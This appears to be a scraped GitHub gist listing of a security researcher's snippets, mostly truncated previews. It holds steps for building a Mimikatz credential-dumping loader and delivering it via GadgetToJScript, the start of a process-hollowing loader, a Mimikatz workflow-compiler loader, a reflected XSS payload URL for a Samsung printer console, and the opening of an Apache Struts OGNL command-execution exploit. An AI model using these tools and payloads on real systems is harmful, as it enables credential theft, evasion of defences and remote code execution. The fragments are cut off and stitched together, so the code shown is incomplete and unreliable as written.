Mohamed El Azaar med0x2e

View GitHub Profile
@med0x2e
med0x2e / Steps.txt
Last active September 22, 2023 09:59
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
3. Use @pljoel's katz.cs file: uncomment the build lines in Delivery.Program.Main() and comment out the Exec() line.
4. Build it to generate file.b64, copy its content, and replace the Package.file string in payload.txt.
6. Make sure the payloadPath variable is set correctly in "TestAssemblyLoader.cs".
@med0x2e
med0x2e / process-hollowing.cs
Last active November 4, 2021 12:49
Process Hollowing (slightly updated to work with G2JS) - credits for the initial code go to @smgorelik and @ambray
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace Hollowing
{
public class Loader
{
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
@med0x2e
med0x2e / steps.txt
Last active September 18, 2021 19:58
Steps to run GadgetToJScript on Linux (Wine)
Steps:
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
@med0x2e
med0x2e / katz.whatever
Last active April 30, 2021 13:07
Mimikatz .NET Loader
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Workflow.Activities;
public class KatzWFCompiler : SequentialWorkflowActivity
{
public KatzWFCompiler()
[Suggested description]
The web console of the Samsung printer model "SCX-824" is vulnerable to
a reflected Cross-Site Scripting (XSS) vulnerability, which can be
triggered via the "print from file" feature, which forwards the
user to the following URL:
"http://<PRINTER_IP>/sws/swsAlert.sws?popupid=successMsg&type=alert&bullet=suc&func=&Nfunc=closePopup("successMsg","","")&flag=&frame=&msg="/><script>alert('XSS');</script>
The vulnerable parameter "msg" is not properly encoded before being interpreted as HTML/JS.
------------------------------------------
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
@med0x2e
med0x2e / compiler-input-obj.xml
Last active August 28, 2018 19:13
CompilerInput Object
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>result.xml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">
<d3p1:anyType xmlns:d4p1="http://www.w3.org/2001/XMLSchema" i:type="d4p1:string">C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll</d3p1:anyType>
</assemblyNames>
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@med0x2e
med0x2e / CVE-2017-11463
Last active December 15, 2017 20:44
CVE-2017-11463
[Suggested description]
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted
Direct Object Reference allows referencing and updating objects
belonging to other users. In other words, a normal user
can send requests to a specific URI with the
target user's username in the HTTP payload in order to retrieve a
key/token and use it to access or update objects belonging to other
users. Such objects include user profiles, tickets, incidents, etc.
------------------------------------------
[Additional Information]
import urllib2
import httplib
def exploit(url, cmd):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."